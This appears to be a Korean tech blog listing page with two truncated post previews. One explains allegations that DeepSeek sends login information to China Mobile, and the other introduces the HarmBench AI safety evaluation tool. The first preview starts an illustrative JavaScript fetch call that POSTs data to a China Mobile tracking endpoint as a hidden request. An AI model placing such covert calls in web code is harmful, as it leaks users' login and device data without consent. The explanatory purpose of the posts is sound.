Loading...
📢 딥시크 로그인 정보 유출 논란! 어떻게 가능할까?
·
knowledge🧠/AI🤖
안녕하세요.최근 중국 AI 서비스 딥시크(DeepSeek) 가 사용자 로그인 정보를 차이나모바일(China Mobile)로 전송하고 있다는 사실이 밝혀졌어요! 😨이게 도대체 어떻게 가능할까요? 비슷한 사례들도 함께 알아볼게요. 🚨🔍 1. 딥시크의 로그인 정보 전송, 어떻게 이루어질까?✅ 1) 로그인할 때 사용자 정보를 가로채는 방식로그인할 때 입력한 아이디(ID)나 기기 정보가 딥시크 서버로 가는 게 아니라, 몰래 차이나모바일 서버에도 전송될 가능성이 커요.이걸 가능하게 하는 방법은 여러 가지가 있어요!💡 방법 1: 웹페이지에 숨겨진 요청 (Hidden API Call) fetch("https://api.chinamobile.com/track", { method: "POST", headers: {..
🤖 AI 보안 평가 도구, HarmBench란?
·
knowledge🧠/AI🤖
안녕하세요!최근 AI 모델이 점점 더 똑똑해지면서, 동시에 유해한 콘텐츠를 생성할 위험도 커지고 있어요. 🤯 그래서 연구자들은 AI 모델이 얼마나 안전한지 테스트하는 도구를 개발하고 있는데, 그중 하나가 바로 HarmBench입니다! 🎯HarmBench는 대규모 언어 모델(LLM)이 유해한 요청에 어떻게 반응하는지 평가하는 도구예요. 예를 들어, AI가 위험한 질문(해킹 방법, 불법 행위, 허위 정보 등)에 답을 해버린다면? 😨 HarmBench를 사용하면 AI가 이런 요청을 처리하는 방식을 테스트하고 개선할 수 있답니다! ✅🎯 HarmBench가 해결하려는 문제AI가 발전하면서 다음과 같은 문제가 발생할 수 있어요:🔹 사이버 범죄 🕵️‍♂️: 해킹, 피싱 사기, 악성 코드 개발법 같은 위험한..